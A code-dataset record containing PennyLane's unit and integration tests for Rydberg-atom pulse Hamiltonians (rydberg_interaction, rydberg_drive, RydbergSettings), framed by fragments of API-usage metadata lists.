"usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 27, "usage_type": "call"}, {"api_name": "core_tools.ops.uint", "line_number": 27, "usage_type": "call"}, {"api_name": "core_tools.ops", "line_number": 27, "usage_type": "name"}, {"api_name": "tensorflow.concat", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.kl_divergence", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 69, "usage_type": "call"}, {"api_name": "core_tools.ops.uint", "line_number": 69, "usage_type": "call"}, {"api_name": "core_tools.ops", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.concat", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.kl_divergence", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "31505356612", "text": "import numpy as np\nimport pytest\n\nimport pennylane as qml\nfrom pennylane.pulse import rydberg_interaction, rydberg_drive\nfrom pennylane.pulse.hardware_hamiltonian import (\n HardwareHamiltonian,\n HardwarePulse,\n AmplitudeAndPhase,\n)\n\nfrom pennylane.wires import Wires\nfrom pennylane.pulse.rydberg import RydbergSettings\n\natom_coordinates = [[0, 0], [0, 5], [5, 0], [10, 5], [5, 10], [10, 10]]\nwires = [1, 6, 0, 2, 4, 3]\n\n\nclass TestRydbergInteraction:\n \"\"\"Unit tests for the ``rydberg_interaction`` function.\"\"\"\n\n def test_queuing(self):\n \"\"\"Test that the function does not queue any objects.\"\"\"\n with qml.queuing.AnnotatedQueue() as q:\n rydberg_interaction(register=atom_coordinates, wires=wires, interaction_coeff=1)\n\n assert len(q) == 0\n\n def test_attributes_and_number_of_terms(self):\n \"\"\"Test that the attributes and the number of terms of the ``ParametrizedHamiltonian`` returned by\n ``rydberg_interaction`` are correct.\"\"\"\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires, interaction_coeff=1)\n settings = RydbergSettings(atom_coordinates, 1)\n\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires(wires)\n N = len(wires)\n num_combinations = N * (N - 1) / 2 # number of terms on the rydberg_interaction hamiltonian\n assert len(Hd.ops) == num_combinations\n assert Hd.pulses == []\n assert Hd.settings == settings\n\n def test_wires_is_none(self):\n \"\"\"Test that when wires is None the wires correspond to an increasing list of values with\n the same length as the atom coordinates.\"\"\"\n Hd = rydberg_interaction(register=atom_coordinates)\n\n assert Hd.wires == Wires(list(range(len(atom_coordinates))))\n\n def test_coeffs(self):\n \"\"\"Test that the generated coefficients are correct.\"\"\"\n coords = [[0, 0], [0, 1], [1, 0]]\n # factor (2 * np.pi) to convert between angular and standard frequency\n Hd = rydberg_interaction(coords, interaction_coeff=1 / (2 * np.pi))\n assert Hd.coeffs == [1, 1, 1 / np.sqrt(2) ** 6]\n\n def test_different_lengths_raises_error(self):\n \"\"\"Test that using different lengths for the wires and the register raises an error.\"\"\"\n with pytest.raises(ValueError, match=\"The length of the wires and the register must match\"):\n _ = rydberg_interaction(register=atom_coordinates, wires=[0])\n\n def test_max_distance(self):\n \"\"\"Test that specifying a maximum distance affects the number of elements in the interaction term\n as expected.\"\"\"\n # This threshold will remove interactions between atoms more than 5 micrometers away from each other\n max_distance = 5\n coords = [[0, 0], [2.5, 0], [5, 0], [6, 6]]\n h_wires = [1, 0, 2, 3]\n\n # Set interaction_coeff to one for easier comparison\n # factor (2 * np.pi) to convert between angular and standard frequency\n H_res = rydberg_interaction(\n register=coords,\n wires=h_wires,\n interaction_coeff=1 / (2 * np.pi),\n max_distance=max_distance,\n )\n H_exp = rydberg_interaction(\n register=coords[:3], wires=h_wires[:3], interaction_coeff=1 / (2 * np.pi)\n )\n\n # Only 3 of the interactions will be non-negligible\n assert H_res.coeffs == [2.5**-6, 5**-6, 2.5**-6]\n assert qml.equal(H_res([], t=5), H_exp([], t=5))\n\n\nclass TestRydbergDrive:\n \"\"\"Unit tests for the ``rydberg_drive`` function\"\"\"\n\n def test_attributes_and_number_of_terms(self):\n \"\"\"Test that the attributes and the number of terms of the ``ParametrizedHamiltonian`` returned by\n ``rydberg_drive`` are correct.\"\"\"\n\n Hd = rydberg_drive(amplitude=1, phase=2, detuning=3, wires=[1, 2])\n\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.settings is None\n assert Hd.wires == Wires([1, 2])\n assert len(Hd.ops) == 3 # 2 amplitude/phase terms and one detuning term\n assert Hd.pulses == [HardwarePulse(1, 2, 3, [1, 2])]\n\n def test_multiple_local_drives(self):\n \"\"\"Test that adding multiple drive terms behaves as expected\"\"\"\n\n # factors (2 * np.pi) to convert between angular and standard frequency\n def fa(p, t):\n return np.sin(p * t) / (2 * np.pi)\n\n def fb(p, t):\n return np.cos(p * t)\n\n H1 = rydberg_drive(amplitude=fa, phase=1, detuning=3, wires=[0, 3])\n H2 = rydberg_drive(amplitude=1 / (2 * np.pi), phase=3, detuning=fb, wires=[1, 2])\n Hd = H1 + H2\n\n ops_expected = [\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 * np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(0), qml.Identity(3), qml.PauliZ(0), qml.PauliZ(3)],\n ),\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(1), qml.PauliX(2)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(1), qml.PauliY(2)]),\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(0), qml.PauliX(3)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(0), qml.PauliY(3)]),\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 * np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(1), qml.Identity(2), qml.PauliZ(1), qml.PauliZ(2)],\n ),\n ]\n coeffs_expected = [\n 3,\n np.cos(3),\n np.sin(3),\n AmplitudeAndPhase(np.cos, fa, 1),\n AmplitudeAndPhase(np.sin, fa, 1),\n fb,\n ]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n # structure of Hamiltonian is as expected\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3, 1, 2])\n assert Hd.settings is None\n assert len(Hd.ops) == 6 # 2 terms for amplitude/phase and one detuning for each drive\n\n # coefficients are correct\n # Callable coefficients are shifted to the end of the list.\n assert Hd.coeffs[0:3] == [3, np.cos(3), np.sin(3)]\n assert isinstance(Hd.coeffs[3], AmplitudeAndPhase)\n assert isinstance(Hd.coeffs[4], AmplitudeAndPhase)\n assert Hd.coeffs[5] is fb\n\n # pulses were added correctly\n assert len(Hd.pulses) == 2\n assert Hd.pulses == H1.pulses + H2.pulses\n\n # Hamiltonian is as expected\n assert qml.equal(Hd([0.5, -0.5], t=5), H_expected([0.5, -0.5], t=5))\n\n def test_no_amplitude(self):\n \"\"\"Test that when amplitude is not specified, the drive term is correctly defined.\"\"\"\n\n # factors (2 * np.pi) to convert between angular and standard frequency\n def f(p, t):\n return np.cos(p * t) / (2 * np.pi)\n\n Hd = rydberg_drive(amplitude=0, phase=1, detuning=f, wires=[0, 3])\n\n ops_expected = [\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 * np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(0), qml.Identity(3), qml.PauliZ(0), qml.PauliZ(3)],\n )\n ]\n coeffs_expected = [f]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n assert qml.equal(Hd([0.1], 10), H_expected([0.1], 10))\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3])\n assert Hd.settings is None\n assert len(Hd.coeffs) == 1\n assert Hd.coeffs[0] is f\n assert len(Hd.ops) == 1\n assert qml.equal(Hd.ops[0], ops_expected[0])\n\n def test_no_detuning(self):\n \"\"\"Test that when detuning not specified, the drive term is correctly defined.\"\"\"\n\n def f(p, t):\n return np.cos(p * t)\n\n Hd = rydberg_drive(amplitude=f, phase=1, detuning=0, wires=[0, 3])\n\n ops_expected = [\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(0), qml.PauliX(3)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(0), qml.PauliY(3)]),\n ]\n coeffs_expected = [\n AmplitudeAndPhase(np.cos, f, 1),\n AmplitudeAndPhase(np.sin, f, 1),\n ]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n assert qml.equal(Hd([0.1], 10), H_expected([0.1], 10))\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3])\n assert Hd.settings is None\n assert all(isinstance(coeff, AmplitudeAndPhase) for coeff in Hd.coeffs)\n assert len(Hd.coeffs) == 2\n assert all(qml.equal(op, op_expected) for op, op_expected in zip(Hd.ops, ops_expected))\n\n def test_no_amplitude_no_detuning(self):\n \"\"\"Test that the correct error is raised if both amplitude and detuning are trivial.\"\"\"\n with pytest.raises(ValueError, match=\"Expected non-zero value for at least one of either\"):\n _ = rydberg_drive(0, np.pi, 0, wires=[0])\n\n\n# For rydberg settings test\nregister0 = [[0.0, 1.0], [0.0, 2.0]]\nregister1 = [[2.0, 0.3], [1.0, 4.0], [0.5, 0.4]]\n\n\nclass TestRydbergSettings:\n \"\"\"Unit tests for TransmonSettings dataclass\"\"\"\n\n def test_init(self):\n \"\"\"Test the initialization of the ``RydbergSettings`` class.\"\"\"\n settings = RydbergSettings(register0)\n assert settings.register == register0\n assert settings.interaction_coeff == 0.0\n\n def test_equal(self):\n \"\"\"Test the ``__eq__`` method of the ``RydbergSettings`` class.\"\"\"\n settings0 = RydbergSettings(register0)\n settings1 = RydbergSettings(register1, interaction_coeff=2.0)\n settings2 = RydbergSettings(register0, interaction_coeff=0.0)\n assert settings0 != settings1\n assert settings1 != settings2\n assert settings0 == settings2\n\n def test_add_two_settings(\n self,\n ):\n \"\"\"Test that two RydbergSettings are correctly added\"\"\"\n\n settings0 = RydbergSettings(register0, interaction_coeff=2.0)\n settings1 = None\n\n settings01 = settings0 + settings1\n settings10 = settings1 + settings0\n assert settings01.register == register0\n assert settings01.interaction_coeff == 2.0\n assert settings10.register == register0\n assert settings10.interaction_coeff == 2.0\n\n # pylint: disable=unused-variable\n def test_raises_error_two_interaction_terms(\n self,\n ):\n \"\"\"Raises error when attempting to add two non-trivial RydbergSettings\"\"\"\n settings0 = RydbergSettings(register0)\n settings1 = RydbergSettings(register1)\n with pytest.raises(ValueError, match=\"Cannot add two\"):\n res = settings0 + settings1\n\n\nclass TestIntegration:\n \"\"\"Integration tests for Rydberg system Hamiltonians.\"\"\"\n\n @pytest.mark.jax\n def test_jitted_qnode(self):\n \"\"\"Test that a Rydberg ensemble can be simulated within a jitted qnode.\"\"\"\n import jax\n import jax.numpy as jnp\n\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n Ht = rydberg_drive(amplitude=fa, phase=0, detuning=fb, wires=1)\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n @qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(Hd + Ht)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(Hd + Ht)(params, ts)\n return qml.expval(H_obj)\n\n params = (jnp.ones(5), jnp.array([1.0, jnp.pi]))\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_jitted_qnode_multidrive(self):\n \"\"\"Test that a Rydberg ensemble with multiple drive terms can be\n executed within a jitted qnode.\"\"\"\n import jax\n import jax.numpy as jnp\n\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n def fc(p, t):\n return p[0] * jnp.sin(t) + jnp.cos(p[1] * t)\n\n def fd(p, t):\n return p * jnp.cos(t)\n\n H1 = rydberg_drive(amplitude=fa, phase=0, detuning=fb, wires=wires)\n H2 = rydberg_drive(amplitude=fc, phase=3 * jnp.pi, detuning=0, wires=4)\n H3 = rydberg_drive(amplitude=0, phase=0, detuning=fd, wires=[3, 0])\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n @qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(Hd + H1 + H2 + H3)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(Hd + H1 + H2 + H3)(params, ts)\n return qml.expval(H_obj)\n\n params = (\n jnp.ones(5),\n jnp.array([1.0, jnp.pi]),\n jnp.array([jnp.pi / 2, 0.5]),\n jnp.array(-0.5),\n )\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_jitted_qnode_all_coeffs_callable(self):\n \"\"\"Test that a Rydberg ensemble can be simulated within a\n jitted qnode when all coeffs are callable.\"\"\"\n import jax\n import jax.numpy as jnp\n\n H_drift = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n def fc(p, t):\n return p[0] * jnp.sin(t) + jnp.cos(p[1] * t)\n\n H_drive = rydberg_drive(amplitude=fa, phase=fb, detuning=fc, wires=1)\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n @qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(H_drift + H_drive)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(H_drift + H_drive)(params, ts)\n return qml.expval(H_obj)\n\n params = (jnp.ones(5), jnp.array([1.0, jnp.pi]), jnp.array([jnp.pi / 2, 0.5]))\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_pennylane_and_exact_solution_correspond(self):\n \"\"\"Test that the results of PennyLane simulation match (within reason) the exact solution\"\"\"\n import jax\n import jax.numpy as jnp\n\n def exact(H, H_obj, t):\n psi0 = jnp.eye(2 ** len(H.wires))[0]\n U_exact = jax.scipy.linalg.expm(-1j * t * qml.matrix(H([], 1)))\n return (\n psi0 @ U_exact.conj().T @ qml.matrix(H_obj, wire_order=[0, 1, 2]) @ U_exact @ psi0\n )\n\n default_qubit = qml.device(\"default.qubit\", wires=3)\n\n coordinates = [[0, 0], [0, 5], [5, 0]]\n\n H_i = qml.pulse.rydberg_interaction(coordinates)\n\n H = H_i + qml.pulse.rydberg_drive(3, 2, 4, [0, 1, 2])\n\n H_obj = qml.PauliZ(0)\n\n @jax.jit\n @qml.qnode(default_qubit, interface=\"jax\")\n def circuit(t):\n qml.evolve(H)([], t)\n return qml.expval(H_obj)\n\n t = jnp.linspace(0.05, 1.55, 151)\n\n circuit_results = np.array([circuit(_t) for _t in t])\n exact_results = np.array([exact(H, H_obj, _t) for _t in t])\n\n # all results are approximately the same\n np.allclose(circuit_results, exact_results, atol=0.07)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/pulse/test_rydberg.py", "file_name": "test_rydberg.py", "file_ext": "py", "file_size_in_byte": 16016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.queuing.AnnotatedQueue", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.queuing", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 25, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 32, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 33, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 35, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 36, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 46, "usage_type": "call"}, {"api_name": "pennylane.wires.Wires", "line_number": 48, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 60, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pennylane.equal", "line_number": 84, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 96, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 98, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwarePulse", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 112, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pennylane.Hamiltonian", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 119, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 119, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 121, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 121, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 122, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 122, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 123, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 123, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 124, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 124, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 127, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 138, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 141, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 148, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 149, "usage_type": "argument"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 150, "usage_type": "argument"}, {"api_name": "pennylane.equal", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 167, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 172, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 172, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 176, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 178, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 179, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 180, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 191, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 193, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 196, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 196, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 200, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 203, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 205, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 206, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 207, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 209, "usage_type": "argument"}, {"api_name": "pennylane.equal", "line_number": 211, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 229, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 235, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 236, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 237, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 247, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 262, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 263, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 277, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 280, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 280, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 283, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 283, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 285, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 287, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 289, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 290, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 294, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 292, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 300, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 301, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 298, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 303, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 303, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 303, "usage_type": "attribute"}, {"api_name": "jax.Array", "line_number": 307, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 308, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 317, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 320, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 320, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 323, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 323, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 326, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 326, "usage_type": "name"}, {"api_name": "jax.numpy.cos", "line_number": 326, "usage_type": "call"}, {"api_name": "jax.numpy.cos", "line_number": 329, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 329, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 331, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 332, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 332, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 332, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 333, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 335, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 337, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 338, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 342, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 343, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 340, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 348, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 349, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 345, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 346, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 352, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 352, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 353, "usage_type": "name"}, {"api_name": "jax.numpy.pi", "line_number": 353, "usage_type": "attribute"}, {"api_name": 